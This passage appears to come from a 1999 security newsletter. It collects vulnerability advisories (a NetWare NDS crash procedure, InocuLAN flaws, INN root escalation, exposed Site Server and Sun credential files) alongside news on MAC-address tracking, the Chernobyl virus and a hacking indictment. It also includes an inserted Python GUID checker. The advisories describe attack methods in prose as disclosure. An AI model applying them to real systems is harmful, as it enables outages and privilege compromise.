However, a malicious user with proper access can force the memory depletion and potentially crash a server that has a replica of the NDS database. This can lead to multiple near-simultaneous server crashes. Of course anyone with administrative access can do this, but they could obviously do other acts that could be just as destructive, if not more so. What is needed is the ability to create a large number of NDS updates very quickly. For example, if a user has the ability to create a container and add objects to it, then that user has enough authority to potentially cause problems to TTS.
Creating a container, dropping a few hundred objects into the container via drag-and-drop and then deleting the container should suffice. If the server lacks a large amount of free memory, the server will quite possibly abend. In other cases, TTS is disabled, which is a form of Denial of Service. As the messages are sent across to other servers containing NDS replicas, they too may crash. In our test environment we were able to crash two servers (Netware 4.1 and Netware 4.11) with the scenario of creating a container, adding a few hundred users, and then deleting the container.

Solution/Workaround
-------------------

NMRC has heard reports of as many as a dozen servers crashing within a couple of minutes of each other, so apply the latest Service Pack for Netware 4.x on all servers or upgrade to Netware 5.

Comments
--------

Novell has already been notified and they are obviously aware of the TTS limitations (refer to the May 1997 TID 2908153 at http://support.novell.com/cgi-bin/search/tidfinder.cgi?2908153 for an example). Per Novell the latest patches for Netware 4.x correct the problem, and Netware 5 does not have the problem at all.

Thanks to Michel Labelle for notifying NMRC about this problem.

_______________________________________________________________________________

See http://www.nmrc.org/news/ for more advisories.

Simple Nomad // thegnome@nmrc.org // ....no rest for the Wicca'd.... www.nmrc.org //

@HWA

04.0 InoculateIT for Windows NT 4.53 scans inbox but misses other inbound msgs
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Wed, 12 May 1999 09:52:59 -0500
From: Bob Duffett
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: InoculateIT 4.53 Real-Time Exchange Scanner Flawed

Manufacturer: Computer Associates
Product: InoculateIT for Windows NT v4.53 Build 169, Agent for Microsoft Exchange

This product has a major defect.
We have it running on our Exchange Server with 1,300 mailboxes yet viruses keep spreading directly from email. I did some investigating tonight and found the problem. It is ONLY scanning the Inbox folder tree. This would sound simply like a poor design but it is MUCH worse. The Inbox Rules Wizard can store the user's rules on the Exchange Server which will move a message to a specific folder without the message ever being placed in a user's inbox. This causes it to completely by-pass the InoculateIT Real-Time Scanner. My CA rep confirmed the problem with CA support who had no work-around available at this time.

Bob
University of Alabama at Birmingham
Cancer Center Technical Services Facility (CCTSF)
mailto:Bob.Duffett@ccc.uab.edu

@HWA

04.1 CA's Inoculan software vulnerabilities on NT Workstation SP3 or SP4
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Sat, 8 May 1999 14:58:08 +1000
From: Glenn Corbett
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Insecure Behaviour in Inoculan Client

Russ,

A problem has been discovered with the InocuLAN client on Windows NT workstations. If an account lockout policy is present on a Windows NT domain, large numbers of repeating account lockouts can occur.

Description:

Incorrect password events (event id 529) are being logged from workstations when running applications from UNC paths. The username that has logged the incorrect password is different to that of the logged on user.

Configuration:

Windows NT workstation SP3 or SP4, with InocuLAN V4.0(373) or InocuLAN V4.0(375)

To reproduce the problem:

1. Install InocuLAN V4.0(373) or V4.0(375) onto an NT workstation with SP3 or SP4 (SP5 not tested yet)

2. Configure InocuLAN as described below:

   Options:
     Direction - Incoming and Outgoing files
     Action upon Virus detection - Cure File
     Cure Action for Macro Viruses - Remove Infected Macros
     Copy File before Cure
     Rename File when Cure Fails
     Rename Extension - AVB
     Move Directory - C:\Inoculan\VIRUS
   Protected Areas:
     Protect Floppy Drives
     Protect Network Drives
     Protect CD-ROM Drives
   Scan Type - Secure Scan

3. Reboot the workstation

4. Log into WorkstationA as Domain UserA, Logout Domain UserA

5. From another workstation change the password of Domain UserA

6. Log into WorkstationA as Domain UserB.

7. From WorkstationA run an application from a remote share on WorkstationX where Logon and Logoff, Success/Failure, are being audited. Run an application from the cmd window using a UNC path with no other connections to the WorkstationX. Eg \\WorkstationX\shareX\notepad

8. The application will take several seconds to run and there will be a failure security event (529) for UserA from Workstation A.

From server manager remotely stop the Cheyenne InocuLAN Anti-Virus Server on Workstation A and repeat step 7. You will see that the application will start immediately and no errors will be recorded in the security event log.

The above problem also causes problems when running logon scripts. If an application is called from the logon script and that application does not exist on the local workstation, the version in the logon share will be run. As soon as the application in the logon script is called there is an event 529 error recorded on the logon server security event log. Even if subsequent different users log into Workstation A, these problems will continue until the workstation is rebooted.

This behaviour can also be seen if in Step 4, a local userA logs on. The subsequent error 529's have the local userA account in the security event.
It appears as though InocuLAN is storing the user credentials for the first logged on user and using them to scan network drives for viruses even when a different user subsequently logs on, until workstation reboot. It is not yet apparent if this username / password is being stored in the registry / temporary file or memory, and therefore open to exploit.

We do not see this problem with InocuLAN V4.0 (4.0 Service Pack 1).

CA have been notified earlier this week, no response as yet.

Thanks

Glenn Corbett
CRISP Project Server / Workstation Team Leader
Compaq Computer Corp, Australia.
Glenn.Corbett@compaq.com (Work)
Glenn.Corbett@bigpond.com (Private)

--------------------------------------------------------------------------------

Date: Fri, 14 May 1999 14:49:17 -0400
From: ARCNT
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: FW: NTBUGTRAQ response - URGENT

The issue reported to NTBUGTRAQ regarding InocuLAN v4.0 build 373 and 375 implies that username/password information is stored "somewhere" on the client side and as such could potentially be exploited. That assertion is inaccurate: the username/password credential combination is NOT stored on the client side by Inoculan (which is why the efforts to locate these credentials in shared memory, in a file or in the registry have been unsuccessful). Clearly, in order for the InocuLAN real-time scanner to access files on a remote server, the software must have valid security contexts in place to permit the requisite access to the file systems and files. The techniques utilized by Inoculan (using low level, but fully documented and supported standard vendor APIs) do NOT require that traditional user credentials (user account/password) be presented in order to gain the necessary access. Rather, Inoculan is able to gain the required access in a completely secure manner without prompting for username and password information.
In addition, it is important to point out that NO attempt to retrieve credential data is done without the user's explicit advance knowledge and consent. Computation/generation of the requisite credential information is done at Inoculan driver initialization time, and can be easily refreshed by simply rebooting the machine (which of course will in turn result in Inoculan initialization routines being invoked as part of system restart). The particular behaviour observed and reported can be attributed to the fact that AFTER Inoculan initialization was completed, the user access credentials for the user in question were modified, rendering the originally computed credential that Inoculan would otherwise utilize invalid.

An enhancement is being developed presently to provide a configuration setting that will instruct the Inoculan real-time scanner to recompute credentials automatically, thus eliminating the need to reboot the client machine. This enhancement will be available by 17:00 Eastern US time, May 21, 1999, and can be downloaded from the standard Computer Associates support web sites (http://support.cai.com).

We appreciate the efforts involved in bringing this issue to our attention and look forward to being able to provide you continued responsive service in the future!

InocuLAN Technical Support

@HWA

05.0 [ISN] Everywhere your MAC address shows up
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Tue, 11 May 1999 21:55:22 -0600 (MDT)
From: cult hero
To: InfoSec News
Subject: [ISN] Everywhere your MAC address shows up

Forwarded From:

MICROSOFT'S HEAVY HAND IN THE COOKIE JAR
A special report from YEOW - Barry Simon.

See the Woody's Office Watch discussion and details on the Office 97 privacy problem. Issues 4.11 and 4.12

Because of the important Internet Explorer 5 coverage some regular WWW features have been held over to the next issue.
We reported earlier on the brouhaha over the inclusion of hardware IDs in the Pentium III chip and privacy advocates' concerns about it. Turns out many of us already have hardware IDs on our systems since all Ethernet cards have a MAC (stands for 'Media Access Control', whatever that means!), a six byte ID number that networks need to be sure to properly direct network packets. Of course, the Pentium III ID's are more serious since many home systems don't (yet) have network cards and the biggest privacy concerns are in the consumer space. Due to wonderful sleuthing by Richard Smith of PharLap (who earlier located the April Fool's Bug discussed in WWW issue 2.2), the world has discovered a number of places that Microsoft has been using these MACs - in Windows 98 IDs, in Office 97 documents and in the microsoft.com cookies. And privacy concerns result from all these uses. To understand the issues, try a few experiments. First, you'll need your MAC assuming you have an Ethernet adapter. With Windows 9x, run the program winipcfg from the Run box. It should load with a dropdown that says 'PPP Adapter'. Change the dropdown to the name of your hardware adapter. The Adapter Address field will say something like 00-70-06-9A-8E-43. That's your MAC. Each byte is presented as two hex digits (0 through 9 or A-F) for a 12 character ASCII string which is what Microsoft uses. With Windows NT, run instead winmsd, go to the Network tab and pick Transports and you'll get the MAC. For the next experiment, you'll need to look at a Word 97 document in text mode. You can't do this with Word. If you have Quick View Plus (plain Quick View won't do), open a Word doc in QVP, go to the View menu and pick View as Text. Or make a small Word doc, save it and rename it to a .txt extension and open it in Notepad. Now search for the string PID. You should find _PID_ GUID and shortly afterwards, a long hex string inside braces such as {F96EB3B9-C9F1-11D2-95EB-0060089BB2DA}. 
Those 12 hex digits at the end will be your MAC. Yup, every Word doc, every Excel spreadsheet and every Power Point presentation is branded with an identifier showing the PC it came from. If your boss has a Word memo you sent her and a copy of the anonymous whistle blowing attachment you sent to the Feds, she could determine they were made on the same machine. (Of course, if you aren't careful, the document includes an author name and if any corrections were made, it may say who made the corrections. Within the next few days, Microsoft expects to post a white paper on all the 'metadata' embedded in Office documents).

To run the next experiments, you'll need Windows 98, so I'll tell you what happens so you can follow along in any event. In your Windows directory, you'll find a file called reginfo.txt. Open it in Notepad and look for a line called HWID; it ends with your MAC. This file is created when you install Windows and is transmitted to Microsoft when you register. And here's the clincher: even if you check the box not to send hardware information, this data is sent. And it's even worse - the data collection code is in an ActiveX control that can be used by any Internet site out there. Pharlap has a demo to illustrate this: go there and it displays your MAC on screen. Any site knowing of this control could track MACs of all Windows 98 visitors to their sites. There is also a demo and discussion at Windows Magazine. By the way, this ActiveX control is also in the Windows 2000 beta so if Microsoft hadn't been found out, NT users would have been hit next.

Next, go to your cookies directory and open the text file whose name ends with microsoft.txt (it probably has a username@ in front where username is your login name). In it you'll find a string called GUID that includes your MAC (GUID, by the way, is short for Global Unique Identifier). This cookie is sent to www.microsoft.com every time you visit that site.
You may have realized they were making a cookie when you registered at their site but I bet you didn't realize they were adding hardware information without your permission. (Actually the Win98 Registration Wizard made the cookie before you went to the Microsoft site.)

You might want to search your Registry for your MAC as a string. I found mine numerous times - two in suspicious places vis-a-vis Microsoft. It's part of a key for Media Player called Client ID (is this passed on to the Media Player servers?) and as part of a key HKCU\Identities that seems to be connected with Outlook Express 5.0.

There is certainly plenty here for the paranoid. Microsoft is collecting and storing in its databases unique hardware information. That information brands your documents, and is always sent on when you access Microsoft's site. One has to consider the possibility that Microsoft is keeping some master database tracking all sorts of interactions based on your MAC. And one has to allow the possibility that the MAC will be encoded in the information that is sent by the Office Registration Wizard in Office 2000.

Microsoft has reacted vigorously to the developments in this story. They have two customer letters (here and here) on their site in which they promise to remove the hardware ID part of the registration wizard in a Win98 upgrade. They also promise to delete 'any hardware ID information that may have been inadvertently gathered without the customer having chosen to provide Microsoft with this information.' Tools have already been posted to remove branding from Office applications and from already-created docs and there is a promise that branding will be removed from the final version of Office 2000.

Beyond these actions, there has been a full court spin operation. Some MS representatives have (unwisely in my opinion) attempted to minimize the issue.
There have been claims that the doc branding was a part of a feature, never implemented, intended solely to help network administrators. There has been harping on the fact that the MAC only identifies a machine but not an individual - true but not of much comfort in many cases. We've been told that Windows 98 sending a HWID even if you said not to send hardware information was a bug, not a feature - an inadvertent programming error. There's been no new statement about the use of MACs in cookies which I find most disturbing.

We've been told by Microsoft representatives that the Office 2000 Registration Wizard doesn't collect MACs or anything like a MAC. Indeed, they claim that while the Office CD serial number can be reconstructed from the 16 byte code sent by the wizard, the hardware info does not allow reconstruction. In particular, if the different CDs were used on the same machine, they'd be unable to tell that the codes came from the same machine.

_____

The problem with the Microsoft position is that the company has so little credibility and there is too much of a pattern here. We pride ourselves on taking a middle road on Microsoft at Woody's newsletters. We don't hesitate to put their feet to the fire but, on the other hand, we don't take the position that Microsoft is the root of all evil and everything they say and do is two faced. That said, Woody's middle name isn't Polly and mine isn't Anna. Microsoft has amply demonstrated that it is company policy to, er, shade the truth when doing so serves a perceived business purpose. We see it in the leaked disinformation about Windows 2000 shipping this fall, we've seen it in their previous reactions to accusations and we saw it too often in the testimony at the DOJ trial. That means one has to take skeptically every statement that Microsoft has made about the MAC problem. I'm inclined to believe that branding of Office documents wasn't part of a plot to link together our entire lives in Microsoft's databases.
But I'm insulted that they try to bat their eyelashes and claim to us that the sending of the HWID even when you told them not to send hardware info was an inadvertent error. And I'm concerned that we have no way of knowing that they've kept their promise to remove hardware IDs from their internal databases. Indeed, my presumption is that they will not. I worry that Microsoft is tucking all sorts of things into the holes they aren't discussing. While they have said they'll stop using HWID, they have also said they'll continue to use the MSID number which is created by the Windows 98 Registration wizard. And, guess what? As discovered by Peter Siering at the German publication C'T Magazine, the registration wizard also creates a Microsoft cookie that includes MSID. So even after the apologies and changes, it seems Microsoft will be quite capable of tracking us and linking online visits to registration information. It's interesting about credibility. There was also an Intel slip reported recently that they claimed was inadvertent. Apparently some mobile Pentium II's shipped with hardware IDs even though these were only announced for Pentium III's. Intel's explanation is that they experimented with this feature in the manufacturing process for the mobile Pentium II but it was supposed to be disabled before shipping. One line inadvertently didn't do the disabling. Intel's credibility is such that I'm willing to accept their claim of inadvertence here. -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". 
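The _PID_GUID branding described in the article above can be checked for on your own files rather than by eye. What follows is an added example, not code from the article, from Woody's newsletters or from Microsoft: it scans a document's raw bytes for GUIDs, reads the version nibble, and flags a version-1 (time-based) GUID whose node field is a unicast address as carrying an adapter address, then compares that node to the address winipcfg reports. The sample bytes are constructed; the first GUID is the one quoted in the article, the other two are made-up contrasts, and the adapter-address form (00-70-06-9A-8E-43 style) is taken from the article.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed sample of what a Word 97 file looks like when viewed as text.
# The first GUID is the one quoted in the article; the second is a made-up
# version-1 GUID whose node has the multicast bit set; the third is a
# made-up random (version-4) GUID.
SAMPLE_DOC = (
    b"\x00\x00Normal.dot\x00\x00_PID_GUID\x00\x00"
    b"{F96EB3B9-C9F1-11D2-95EB-0060089BB2DA}\x00\x00"
    b"{F96EB3B9-C9F1-11D2-95EB-0160089BB2DA}\x00\x00"
    b"{123E4567-E89B-42D3-A456-426614174000}\x00"
)

# Braced, hyphenated GUID text exactly as Office writes it.
GUID_RE = re.compile(
    rb"\{[0-9A-Fa-f]{8}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{12}\}"
)


@dataclass
class GuidFinding:
    guid: str
    version: int        # high nibble of the third group (1 = time-based, 4 = random)
    node: str           # last 12 hex digits as colon-separated octets
    mac_branded: bool   # version 1 with a unicast node: the node is an adapter address


def classify_guid(guid: str) -> GuidFinding:
    """Decide whether a GUID's node field looks like a real Ethernet address.

    Time-based (version 1) GUIDs carry a 48-bit node.  When the generator has
    no adapter to use it sets the multicast bit (bit 0 of the first octet) so
    the value cannot collide with a real MAC.  A version-1 GUID whose multicast
    bit is clear therefore exposes the adapter address of the generating PC.
    """
    parts = guid.strip("{}").split("-")
    version = int(parts[2][0], 16)
    node_hex = parts[4].upper()
    multicast = bool(int(node_hex[:2], 16) & 0x01)
    node = ":".join(node_hex[i:i + 2] for i in range(0, 12, 2))
    return GuidFinding(guid, version, node, version == 1 and not multicast)


def find_branding(blob: bytes) -> list[GuidFinding]:
    """Extract every GUID from a document's raw bytes and classify each one."""
    return [classify_guid(m.group(0).decode("ascii")) for m in GUID_RE.finditer(blob)]


def branded_with(blob: bytes, adapter_address: str) -> bool:
    """True if the document carries the given adapter address.

    adapter_address is accepted in the winipcfg form (00-70-06-9A-8E-43) or
    with colons; comparison is case-insensitive.
    """
    wanted = adapter_address.replace("-", ":").upper()
    return any(f.mac_branded and f.node == wanted for f in find_branding(blob))


if __name__ == "__main__":
    for f in find_branding(SAMPLE_DOC):
        flag = "adapter address exposed" if f.mac_branded else "no adapter address"
        print(f"{f.guid}  v{f.version}  node {f.node}  {flag}")
```

Run it against a copy of a .doc, .xls or .ppt read in binary mode (the same "rename to .txt and open in Notepad" trick, automated); a hit from branded_with with the address winipcfg shows is the branding the article describes, and a version-1 GUID with the multicast bit set is the form a tool that strips branding would leave behind.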
Today's ISN Sponsor: Hacker News Network [www.hackernews.com]

@HWA

06.0 [ALERT] Site Server 3.0 May Expose SQL IDs and PSWs
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Tue, 11 May 1999 16:27:38 -0600
From: Mark
To: BUGTRAQ@netspace.org
Subject: [ALERT] Site Server 3.0 May Expose SQL IDs and PSWs

====================================================
Site Server's AdSamples Directory Reveals ID and PSW
Discovered by Andrey Kruchkov
====================================================

VERSIONS AFFECTED

* Tested on Microsoft Site Server 3.0 Commerce Edition

DESCRIPTION

Site Server allows the installation of an AdSamples directory, which serves to demonstrate the capabilities of the Ad Server component. If this directory is installed and left open to the public without limiting directory permissions, a user can obtain a site configuration file (SITE.CSC) that contains sensitive information pertaining to an SQL database. This information could contain a DSN, as well as a username and password used by the Ad Server to access the SQL server database.

COMMENTS

Andrey reported this problem to NTSECURITY.NET and has informed Microsoft of this issue. Andrey points out an easy way to eliminate this risk: Remove the "AdSamples" virtual directory from the DEFAULT root Web site, or change security permissions for this folder to sufficiently restrict access. If you must provide loose access to this virtual directory for some strange reason, then you should at least adjust the security permissions for the SITE.CSC file so that it's not available for viewing. Also keep in mind that there may be numerous other SITE.CSC files under your Site Server installation, all of which need to be secured.
For a URL that demonstrates the problem, please visit http://www.ntsecurity.net/scripts/loader.asp?iD=/security/siteserver-2.htm This is probably a great time to remind people once again to NEVER install sample content on production servers and to NEVER use the built-in IIS DEFAULT Web site without first thoroughly investigating the implications of doing so. Thanks, Mark - http://www.ntsecurity.net @HWA 07.0 inndstart vulnerability, possible root compromise ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Tue, 11 May 1999 11:24:06 -0400 From: Forrest J. Cavalier III Reply-To: userkt-l@mibsoftware.com To: BUGTRAQ@netspace.org Subject: INN 2.0 and higher. Root compromise potential Copyright 1999 Forrest J. Cavalier III, Mib Software This information is provided by Mib Software, www.mibsoftware.com. This notice can be distributed without limitation. Summary: -------- INN is open source NNTP (Usenet) server software from the Internet Software Consortium. http://www.isc.org/ In some cases, there is potential for the local news user, or any local user, to execute arbitrary code as root. The two vulnerabilities reported below have already been discussed in the Usenet newsgroup news.software.nntp. Therefore, the vendor is being sent this notice now, and was not notified previously. INN is communications software. Mib Software knows of no buffer overrun exploits of the affected versions of INN, but the possibility cannot be ruled out. This would be the only way a root compromise using a remote connection would be possible. Background: ----------- Since NNTP defines a privileged port (119), a SUID root wrapper, inndstart, binds to the port, and then is intended to drop root privileges, setting the UID to user news before exec() innd. In some cases, this behavior can be altered to gain privileges. 
------------------------------------------------------------
Vulnerability 1 (pathrun should not be trusted information)
------------------------------------------------------------

Summary: It is possible for the news user to control the behavior of the inndstart program so that root privileges are not dropped, and execute arbitrary programs as root.

Versions affected: INN 2.0 and higher.
Versions not affected: INN 1.7.2 and lower.

Details: inndstart determines the target UID and GID from the UID and GID of a directory which is normally owned by user news, group news. The directory which is checked can be changed by editing the "pathrun" parameter in the inn.conf configuration file. By specifying a directory with appropriate ownership, inndstart can exec() running as any user, including root. During the course of normal operation, innd fork()s and executes many child processes, and it is relatively simple to run arbitrary code from innd.

Solution: modify the source file innd/inndstart.c to use a hard coded pathrun, instead of the structure member innconf->pathrun.

Workaround: There is no workaround. The source must be modified.

------------------------------------------------------------------
Vulnerability 2 (inndstart should be protected, INNCONF environment variable should not be trusted.)
------------------------------------------------------------------

Versions affected: INN 2.x after July 9, 1998 (including INN 2.1 and higher.)
Versions not affected: INN 1.7.2 and lower.

Details: Normally, the SUID root program inndstart should be in a directory accessible only by user news. In some installations, this program is accessible to all local users. On July 9, 1998 a source code change was introduced which obtains the path of the configuration file from the environment variable INNCONF.
In those installations with inndstart accessible to local users, a local user can set INNCONF in the environment and determine the behavior of inndstart so that arbitrary programs are executed. If the pathrun vulnerability above is fixed, these programs run as user news; if not fixed, they run as user root.

Solution: Install inndstart in a directory with 0700 permissions owned by user news.

-------------------------------------------------------------------
Forrest J. Cavalier III, Mib Software, INN customization and consulting
'Pay-as-you-go' commercial support for INN: Only $64/hour!
Searchable hypertext INN docs, FAQ, RFCs, etc: 650+ pages.
http://www.mibsoftware.com/innsup.htm

@HWA

08.0 Sunsolve.Database leaks crucial info about itself and its users
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Tue, 11 May 1999 19:22:59 +0100
From: "Robson, Ken"
To: BUGTRAQ@netspace.org
Subject: Sun Microsystems Leaks extensive Amounts of Information About Itself & Its Customers Through Its Sunsolve Database...

Hi Folks,

I have just been scouring Sun's Bug Reports for some information and I discovered that you can easily trawl for useful information about both Sun and its clients. Information exposed includes:-

* Copies of /etc/passwd (i.e. user names)
* Copies of /etc/shadow (i.e. encrypted passwords)
* Configuration of network services (i.e. inetd.conf)

It is trivial to put together searches that glean this for some of their customers. Whilst the contract services restrictions are in place for accessing these accounts, logins must be in wide circulation. I know 3 or 4 accounts from various past employers myself.

When logging a support call I do not often consider what might happen to the call notes. I am sure that Sun are not the only company doing this and this is not aimed at Sun in particular, they are just an example.
Serious consideration should be given to what information you are prepared to pass to those who support you - do you trust the rest of their customers (at best) or the entire internet (at worst).

Anyway not earth shattering but food for thought.

Regards,

Ken.

PS - Please do not interpret the domain that this mail comes from as any indication that I work for the European Bank for Reconstruction & Development. I in fact contract to Hewlett Packard and am simply based at the bank - all the opinions expressed above are my own and have nothing to do with either of these organisations.

-----------------------------------------------------------------------------

Date: Wed, 12 May 1999 09:56:00 -0700
From: Alan Coopersmith
To: BUGTRAQ@netspace.org
Subject: Re: Sun Microsystems Leaks extensive Amounts of Information About Itself & Its Customers Through Its Sunsolve Database

> When logging a support call I do not often consider what might happen to the
> call notes. I am sure that Sun are not the only company doing this and this
> is not aimed at Sun in particular, they are just an example. Serious
> consideration should be given to what information you are prepared to pass
> to those who support you - do you trust the rest of their customers (at
> best) or the entire internet (at worst).

The actual service order notes are not available to customers through SunSolve - but parts of bug reports that may be generated by them are. At least a few years ago when I worked in SunService they reminded us not to put customer information in the public part of bug reports, but there was no review system to make sure we didn't screw up. If you want to protect yourself, make sure that if your call results in a bug report you go to SunSolve and review the public copy to make sure there's nothing in there you wouldn't want others to see and if there is, call up your service rep and make them move it to the sun-internal-access-only section of the bug report.
Disclaimer: I no longer work in Tech Support at Sun and do not and cannot speak for SunService or whatever they're called after the latest "realignment of the Sun planets". -- ________________________________________________________________________ Alan Coopersmith alanc@godzilla.EECS.Berkeley.EDU Univ. of California at Berkeley http://soar.Berkeley.EDU/~alanc/ aka: alanc@{CSUA,OCF,CS,BMRC,EECS,ucsee.eecs,cory.eecs}.Berkeley.EDU @HWA 09.0 [ISN] Asia is wide open to virus, hacker attacks ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Forwarded From: William Knowles http://www.feer.com/Restricted/99may_20/tech.html (Feer.com) [5.20.99] How personal are personal computers? At the rate Asian companies and individuals are exposing their computers to on-line infection and intrusion, they may as well drop the "P" from PC. The information highways are proving very public, but many Asians are travelling naked and defenceless. Computer viruses are the region's biggest problem. Two major virus attacks in March and April crippled hundreds of thousands of Asia's computers. Then in late April, the Singapore government was caught snooping into PCs without seeking permission from their owners. The incidents have highlighted the need to protect PCs from viruses and unwanted intruders--protection that's sorely lacking in the region. While multinational companies now keep a constant vigil on the security of their computer networks, many other companies and individuals have left themselves vulnerable. To protect against viruses, they need to install and diligently update antivirus software, which costs an average of $50 per program for personal use. Large companies have for many years installed virtual "firewalls" that combine antivirus, antihacking and other protective software, but antihacking and personal-data security programs are only just becoming commercially available to individual PC users. The latest virus hit more than 650,000 computers in Asia. 
Named Chernobyl, it remained dormant until April 26, the 13th anniversary of the Chernobyl nuclear-plant disaster in Ukraine. On that day, the virus disabled computers, destroyed programs and erased large amounts of stored information. Xinhua news agency reported that 360,000 PCs were affected in China. The virus's Taiwanese creator, 24-year-old Chen Ing-hau, said he had wanted to cause mayhem on the mainland. Chen was arrested but released without charge due to a lack of plaintiffs in Taiwan, where no infections were reported.

"Chernobyl's been known about and treatable for over a year and still people were caught out," says Daniel Schneersohn, Hong Kong-based regional director for Symantec, an American maker of antivirus software. He says many customers had such software installed, but had simply not activated it. Half of the damaged PCs in China, for instance, had protective software that was not turned on.

Although most corporate PCs shipped to South Korea since 1997 contain antivirus software, Chernobyl infected an estimated 250,000 PCs in that country. Many companies allow their employees to turn off antivirus software, which can slow down the computer while it monitors for infections. Many users had failed to keep installed software up-to-date. "It's not enough to buy antivirus software and install it or even activate it," says Schneersohn. "You've got to update the software--the antivirus companies update the virus threat lists every week."

Eric Sheridan, director of Asia business development for U.S. computer-systems company Corporate Software & Technology, says most of his customers, almost all multinationals, escaped Chernobyl unscathed. "Our customers all have ongoing contracts for security and virus protection, or they have good in-house teams at work," he explains. Most at risk are individual PC users and companies with less sophisticated information-technology departments, Sheridan says, especially as they make increasing use of the Internet. "Once you have a few offices up and on-line you have to take outside threats like viruses and hacking seriously."

Schneersohn agrees that while multinational firms are taking these threats seriously, the rest of the Asia-Pacific isn't. "Even some big listed companies in Hong Kong don't use antivirus protection," he says. Smaller businesses in particular have turned to pirated antivirus programs during the economic crisis to keep costs down. But they lose the advantages of software support and advice, says Schneersohn. "It's software use at its lowest level and that's why the highest level of infections are in small businesses and homes" where pirated programs are most prevalent.

Still, even pirated-software users could have protected themselves by downloading updates of antivirus programs from the manufacturer's Web site. For now, most software companies don't bother to trace pirates who download updates, says Schneersohn--although Symantec's next generation of antivirus software will update only registered users.

Just as the dust settled from the Chernobyl attack, Internet users in Singapore were faced with a more organized affront to their computer privacy. SingNet, an Internet service provider, acknowledged that it asked the Home Affairs Ministry's IT security unit to scan its customers' PCs for viruses without their consent. SingNet is owned by Singapore Telecom, which is in turn 80%-owned by the government.

SingNet's actions only came to light because a student, who had downloaded antihacker software from the Internet onto her PC, traced the scan back to the ministry. SingNet's home page on the Web apologizes for the intrusion--"We should have informed you first," it says--and invites visitors to voluntarily submit to the virus search instead. The company says the scanning did not "enter" any PCs nor unveil any personal data. Also, SingNet claims it found 900 PCs infected with "trojan horse" viruses that allow hackers to enter computers via the Internet and take almost complete control.

The SingNet action and the discovery of the "trojan horse" viruses highlight the ease with which PCs can be snooped on while on-line. "If breaking in is so easy, some less scrupulous companies may well start thinking that it might be worth throwing a few bucks at some kid to look into their competitors' files," says Schneersohn.

For personal and small-business users, encryption is one option for protecting confidential data from hackers. But use of encryption is either illegal or legally untested in many Asian countries. A second option is to remove confidential data to a separate disk drive and access it only when the user is off-line.

To protect stored data while the user is on-line, demand will probably grow among personal and small-business PC owners for simpler versions of the "firewalls" that large companies use to protect their computer networks from intrusion. Schneersohn says antivirus software makers are already looking into the market. "Many people want to block access to personal files to all third parties--you could call it a personal firewall. They simply want to regain control of what's happening on their computers."

-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: Hacker News Network [www.hackernews.com]

@HWA

10.0 More on Zyklon's legal troubles
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

Zyklon Busted
contributed by Space Rogue

HNN first reported this news early Friday morning and has now learned more details. Zyklon (Eric Burns) has now been charged with three counts of unlawful computer intrusion. The counts are believed to be for alleged attacks on the USIA (US Information Agency) web site, which was hosted by Electric Press in Herndon, Va.
Other companies allegedly attacked were LaserNet in Fairfax, Va., and Issue Dynamic Inc., which also has machines in VA. The total damage estimates are listed as $15,000 (which seems a little low compared to other similar cases). It is believed that the Secret Service will also question Zyklon in connection with any involvement he may or may not have had in the recent whitehouse.gov crack.

Copy of the Indictment
http://www.hackernews.com/orig/zyklon.html

MSNBC
http://www.msnbc.com/news/269584.asp

ABC News
http://abcnews.go.com/sections/tech/DailyNews/whitehousehacker990515.html

IN THE UNITED STATES DISTRICT COURT FOR THE
EASTERN DISTRICT OF VIRGINIA

Alexandria Division

UNITED STATES OF AMERICA      )
                              )
          v.                  )  Criminal No.
                              )
                              )  Counts 1-3: Computer Intrusion
ERIC BURNS                    )  (18 U.S.C. § 1030(a)(5))
also known as "Zyklon"        )
                              )
          Defendant.          )

INDICTMENT

May 1999 Term - At Alexandria, Virginia

COUNT 1

THE GRAND JURY CHARGES THAT:

From on or about August 25, 1998, through on or about January 22, 1998, in the Eastern District of Virginia and elsewhere, ERIC BURNS, also known as "Zyklon," defendant herein, knowingly and intentionally caused transmissions from a computer in Shoreline, Washington, of programs, information, codes, and commands, and as a result of such conduct, intentionally caused damage without authorization to a computer of Electric Press, Herndon, Virginia, which was a protected computer used by and for the United States Information Agency, an agency of the United States Government, and the conduct affected the use of the computer by and for the government and caused loss aggregating at least $5,000 to at least one individual between August 25, 1998 and March 1, 1999.

(In violation of Title 18, United States Code, Section 1030(a)(5)(A).)

COUNT 2

THE GRAND JURY CHARGES THAT:

From on or about December 28, 1998, through on or about December 31, 1998, in the Eastern District of Virginia and elsewhere, ERIC BURNS, also known as "Zyklon," the defendant herein, knowingly and intentionally caused transmissions from a computer in Shoreline, Washington, of programs, information, codes, and commands, and as a result of such conduct, intentionally caused damage without authorization to a computer of Computer Tech Services, doing business as LaserNet, in Fairfax, Virginia, which was a protected computer used in interstate commerce and communication, and caused loss aggregating at least $5,000 to at least one individual between December 28, 1998, and March 1, 1999.

(In violation of Title 18, United States Code, Section 1030(a)(5)(A).)

COUNT 3

THE GRAND JURY CHARGES THAT:

